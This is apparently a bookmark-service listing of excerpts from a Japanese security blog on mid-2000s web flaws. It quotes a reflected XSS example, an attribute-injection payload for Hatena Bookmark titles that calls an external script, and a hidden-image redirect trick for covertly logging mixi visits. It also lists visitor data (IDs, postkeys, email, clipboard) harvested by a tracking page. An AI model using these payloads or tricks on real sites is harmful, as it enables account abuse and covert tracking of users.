XSS - 表示系パラメータに存在する盲点 :: ぼくはまちちゃん!
こんにちはこんにちは!! クロスサイトスクリプティングの時間です! XSSというと…! まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね! たとえばこんな感じのフォームから受け取ったパラメータを、 確認として表示するページとか! (入力) <form action="register.cgi" method="post"> タイトル:<input type="text" name="title"> ← 「ぼくはまちちゃん!」を入力 本文:<input type="text" name="body"> ← 「こんにちはこんにちは!!<script>alert(1)</script>」を入力 </form> (確認) <p>この内容で登録していい?</p> <p> タイトル: ぼくはまちちゃん!<br> 本文: こんにちはこんにちは!!<script>alert
超mixi足あとちょうについて :: ぼくはまちちゃん!
こんにちはこんにちは!! 現在の超mixi足あとちょうは、何度かのバージョンアップをして、以下のような内容になってますよ! きみのMIXI ID: きみのpostkey: きみのメールアドレス: ※mixiの修正が4回入って、現在は非表示 きみのブラウザ: きみのホスト名: リンク元: (おまけ4) きみのYahoo ID: (おまけ5) きみのHatena ID: (おまけ2) きみのlivedoor ID: (おまけ6) きみのGoogleアカウント: (おまけ3) きみのなまえ(amazon): (おまけ7) きみの好みのタイプ: (おまけ1) きみのクリップボードの中身 ところで、超mixi足あとちょうの追記にも書いたけれど、 「hamachiya.com を見にいかなければ大丈夫」で 思考停止するのって一番危険なんじゃないかな、と思うんだけど…! ここをみている一部の方々は、たぶ
mixi足あとちょうを、さらにバレにくくする :: ぼくはまちちゃん!
はまちや2さんの日記 mixi足あとちょうを、さらにバレにくくする2006/02/05 [15:53] (参考) mixi足あとちょう なんだか最近↑みたいに、自分のサイトのimgタグにmixiを指定して こっそり足あとを取るのが流行ってるらしい、って聞いたんですが!! 「わーぼくのサイトにもimgタグにmixi仕込んでみたいな~」 「けどバレちゃったら感じ悪いし…><」 なんて感じで二の足を踏んでいた人たちはいるかな! じゃあ、こんなふうにしてみればどうだろう…! かなりバレにくくなると思うよ! .htaccessとかに以下のように書いておく Redirect 302 /spacer.gif http://mixi.jp/show_friend.pl?id=609805 そしたら、htmlは↓みたいにするだけ! <img src="spacer.gif" width="1" height
はてなブックマークの超べんり機能 :: ぼくはまちちゃん!
タイトルを↓みたいに編集すれば、ユーザーが自由にScriptつかえちゃうんだね! ぼく、ゆめがひろがりんぐです! "width=100 height=100 onmouseover=alert(String.fromCharCode(88,83,83)) ※最初にダブルクォート、最後に空白をひとついれる。 あ、人気エントリーのタイトルとか書き換えたらダメだよ…! えらいことになっちゃうかも? (追記) http://test/ ってurlのブックマークにテスト用のコードを置いてみたよ! タイトルが以下になってて hamachiya.com/h のscriptを呼び出す感じ。 (消しゴムに触れると呼び出されて、hamachiya.comをブックマークに追加してしまうという内容) "width=100 height=100 onmouseover=d=document;t=String; s=
いろんなGoogle :: ぼくはまちちゃん!
なるほどそういうことか!ありがとう!! ぼくも英辞郎でしらべてみたよ! > Uncle Sam > アメリカ政府◆【語源】省略するとU.S.になるところから ってかいてあった!
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
